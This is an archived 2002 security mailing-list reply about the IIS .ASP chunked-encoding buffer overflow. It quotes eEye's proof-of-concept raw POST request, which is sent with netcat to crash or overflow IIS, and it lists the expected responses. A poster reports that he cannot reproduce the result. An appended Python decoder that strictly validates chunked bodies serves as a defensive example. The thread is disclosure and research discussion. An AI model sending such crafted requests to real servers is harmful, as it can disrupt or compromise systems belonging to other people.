RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

From: MadHat (madhat@unspecific.com)
Date: 04/12/02


From: MadHat <madhat@unspecific.com>
To: Erik Parker <eparker@mindsec.com>
Date: 12 Apr 2002 09:11:55 -0500

I have not been able to reproduce these results. I have managed to lock
up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
appear and no entries in the Application Log. I have also been able to get
the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
still no popup or messages.

Is there a reliable way to scan for these vulnerabilities remotely?

On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
> JM> Anyone have a proof of concept for this exploit?
>
> eEye included some. Use this with "netcat" or "telnet"
>
> replace [enter] with an actual pressing of your enter key (look at the
> bottom, you can cut n paste)
>
> It should return something like this, if it worked (and generate a popup
> error to you that says "Unknown has generated errors")
>
> HTTP/1.1 100 Continue
> Server: Microsoft-IIS/5.0
> Date: Wed, 27 Mar 2002 23:37:32 GMT
>
> If it fails, it'll say something like:
>
> HTTP/1.1 500 Server Error
> Server: Microsoft-IIS/5.0
>
>
> The application log will say:
>
> Active Server Pages service has started
> Access performance data was denied to IWAM_netbiosname as attempted from c:\WINNT\SYSTEM32\Drwtsn32.exe
>
>
> **************Begin Session****************
> POST /iisstart.asp HTTP/1.1
> Accept: */*
> Host: eeye.com
> Content-Type: application/x-www-form-urlencoded
> Transfer-Encoding: chunked
>
> 10
> PADPADPADPADPADP
> 4
> DATA
> 4
> DEST
> 0
> [enter]
> [enter]
> **************End Session******************
>

-- 
MadHat at Unspecific.com
gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
Key fingerprint = E786 7B30 7534 DCC2 94D5  91DE E922 0B21 9DDC 3E98
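A strict decoder for the chunked request body in the quoted session, added here as an example (it is not code from this thread or from eEye's advisory). The bytes are reconstructed from the session above with CRLF line endings; the body-size limit is an assumed value, and trailer headers after the last chunk are deliberately not accepted. This is the kind of validation a reverse proxy or WAF can apply before forwarding a chunked body to a backend.

```python
import re
from typing import List

# Constructed reproduction of the request body from the quoted session,
# exactly as it would go over the wire (CRLF line endings).
SESSION_BODY = (
    b"10\r\nPADPADPADPADPADP\r\n"
    b"4\r\nDATA\r\n"
    b"4\r\nDEST\r\n"
    b"0\r\n\r\n"
)

# chunk-size line: 1..8 hex digits, optional ";ext" chunk extensions
_SIZE_LINE = re.compile(rb"^([0-9A-Fa-f]{1,8})(;.*)?$")


def decode_chunked(raw: bytes, max_body: int = 1 << 20) -> List[bytes]:
    """Decode an HTTP/1.1 chunked body strictly and return the chunk payloads.

    Raises ValueError for input a lenient parser might pass through: a
    non-hex or over-long size line, a payload not followed by CRLF, a
    truncated payload, a missing terminator, or a total over max_body
    (assumed limit; trailers are not supported by this decoder).
    """
    chunks: List[bytes] = []
    pos = 0
    total = 0
    while True:
        end = raw.find(b"\r\n", pos)
        if end < 0:
            raise ValueError("chunk-size line not terminated by CRLF")
        m = _SIZE_LINE.match(raw[pos:end])
        if not m:
            raise ValueError(f"bad chunk-size line: {raw[pos:end]!r}")
        size = int(m.group(1), 16)
        pos = end + 2
        if size == 0:
            # last-chunk: require the closing empty line right away
            if raw[pos:pos + 2] != b"\r\n":
                raise ValueError("missing blank line after last chunk")
            return chunks
        total += size
        if total > max_body:
            raise ValueError("decoded body exceeds limit")
        payload = raw[pos:pos + size]
        if len(payload) != size:
            raise ValueError("truncated chunk payload")
        if raw[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk payload not followed by CRLF")
        chunks.append(payload)
        pos += size + 2
```

Run against SESSION_BODY it yields the three payloads (16, 4 and 4 bytes); a non-hex size line, a truncated chunk, or a size like FFFFFFFF is rejected instead of being passed downstream.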